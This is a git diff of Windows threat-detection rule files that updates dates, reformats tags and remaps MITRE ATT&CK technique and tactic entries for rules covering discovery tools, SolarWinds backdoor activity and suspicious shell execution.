@@ -83,44 +83,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_adfind_command_activity.toml b/rules/windows/discovery_adfind_command_activity.toml index 154f036722d..eb934734102 100644 --- a/rules/windows/discovery_adfind_command_activity.toml +++ b/rules/windows/discovery_adfind_command_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,10 +104,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" [[rule.threat.technique]] id = "T1018" @@ -118,30 +114,28 @@ reference = "https://attack.mitre.org/techniques/T1018/" id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml index 03d5ecdf531..98ab72dd698 100644 --- a/rules/windows/discovery_command_system_account.toml +++ b/rules/windows/discovery_command_system_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,16 +55,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -96,31 +87,18 @@ not (process.parent.name : "cmd.exe" and process.working_directory : "C:\\Progra [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml index 885e2d7cfcf..ef606a7f6e7 100644 --- a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml +++ b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,19 +93,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_high_number_ad_properties.toml b/rules/windows/discovery_high_number_ad_properties.toml index ba1b6f16be2..9bb71b502f5 100644 --- a/rules/windows/discovery_high_number_ad_properties.toml +++ b/rules/windows/discovery_high_number_ad_properties.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,14 +85,28 @@ any where host.os.type == "windows" and event.code == "4662" and not winlog.even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_host_public_ip_address_lookup.toml b/rules/windows/discovery_host_public_ip_address_lookup.toml index 70ce393aac1..5db11daaac7 100644 --- a/rules/windows/discovery_host_public_ip_address_lookup.toml +++ b/rules/windows/discovery_host_public_ip_address_lookup.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,19 +55,7 @@ references = ["https://attack.mitre.org/techniques/T1016/"] risk_score = 73 rule_id = "642ce354-4252-4d43-80c9-6603f16571c1" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -131,31 +119,18 @@ network where host.os.type == "windows" and dns.question.name != null and proces [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/discovery_posh_invoke_sharefinder.toml b/rules/windows/discovery_posh_invoke_sharefinder.toml index 71301265659..b0a36b60dc8 100644 --- a/rules/windows/discovery_posh_invoke_sharefinder.toml +++ b/rules/windows/discovery_posh_invoke_sharefinder.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,16 +114,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -146,51 +137,16 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml index 4fa1272e100..4ab7a7dd03b 100644 --- a/rules/windows/discovery_posh_suspicious_api_functions.toml +++ b/rules/windows/discovery_posh_suspicious_api_functions.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -106,16 +106,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -165,25 +156,41 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [[rule.threat.technique]] id = "T1135" @@ -195,46 +202,10 @@ id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml index 0c166da5fd0..14d4432265c 100644 --- a/rules/windows/discovery_whoami_command_activity.toml +++ b/rules/windows/discovery_whoami_command_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,14 +117,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml index 74799bd0dbd..d025ed0e6f3 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,21 +67,7 @@ references = [ risk_score = 47 rule_id = "d72e33fc-6e91-42ff-ac8b-e573268c5a87" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -100,10 +86,12 @@ process.parent.name: ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -114,27 +102,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml index 548fd088051..59cb3fe1d9f 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,16 +57,7 @@ references = [ risk_score = 47 rule_id = "93b22c0a-06a0-4131-b830-b10d5e166ff4" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -96,31 +87,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml index c7deeed356b..fa047e4e93e 100644 --- a/rules/windows/execution_com_object_xwizard.toml +++ b/rules/windows/execution_com_object_xwizard.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,20 +67,7 @@ references = [ risk_score = 47 rule_id = "1a6075b0-7479-450e-8fe7-b8b8438ac570" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -105,19 +92,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml index 764af8ffaf6..f9e4f0e18a5 100644 --- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml +++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,16 +100,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] type = "eql" query = ''' @@ -134,29 +125,39 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml index 6424adbe5c9..96e430f08d1 100644 --- a/rules/windows/execution_command_shell_started_by_svchost.toml +++ b/rules/windows/execution_command_shell_started_by_svchost.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/29" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -132,17 +132,31 @@ not process.args:(".\inetsrv\iissetup.exe /keygen " or "C:\Program" or "C:\Progr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/windows/execution_command_shell_started_by_unusual_process.toml b/rules/windows/execution_command_shell_started_by_unusual_process.toml index 3db3ebe2ccf..3dc455db3cd 100644 --- a/rules/windows/execution_command_shell_started_by_unusual_process.toml +++ b/rules/windows/execution_command_shell_started_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,14 +114,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml index c0273819d72..b4ad329ff0c 100644 --- a/rules/windows/execution_command_shell_via_rundll32.toml +++ b/rules/windows/execution_command_shell_via_rundll32.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,20 +58,7 @@ RunDLL32 is a legitimate Windows utility used to execute functions in DLLs, ofte risk_score = 21 rule_id = "9ccf3ce0-0057-440a-91f5-870c6ad39093" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -87,10 +74,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -101,39 +108,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git 